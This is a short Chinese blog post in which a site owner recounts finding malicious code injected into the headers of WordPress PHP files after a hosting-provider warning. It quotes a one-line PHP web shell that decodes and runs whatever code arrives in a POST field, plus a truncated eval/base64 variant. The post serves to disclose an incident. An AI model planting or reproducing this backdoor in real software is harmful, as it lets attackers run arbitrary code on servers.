也遭遇网页挂马

早上起来收到bluehost的邮件,称我的帐户里面有恶意代码,都是针对wordpress,并且列举如下:

<?php if ($_POST["php"]){eval ( base64_decode($_POST["php"]));exit;} ?>
eval ( base64_decode($_POST["php"]));

<?php           eval ( base64_decode("balabala……balabala")); //这段之所以有简略和增加空格是因为怕被防火墙ban掉

查看了一下文件,发现是在有些php文件的头部分加入了这个东西,这个东西之前并没有看到,删掉之后也没有什么影响。

一直没有很重视安全这一块,如今终于被黑,算是寡人踏入本领域的一个标志性事件吧。

发表评论

电子邮件地址不会被公开。 必填项已用*标注

This site uses Akismet to reduce spam. Learn how your comment data is processed.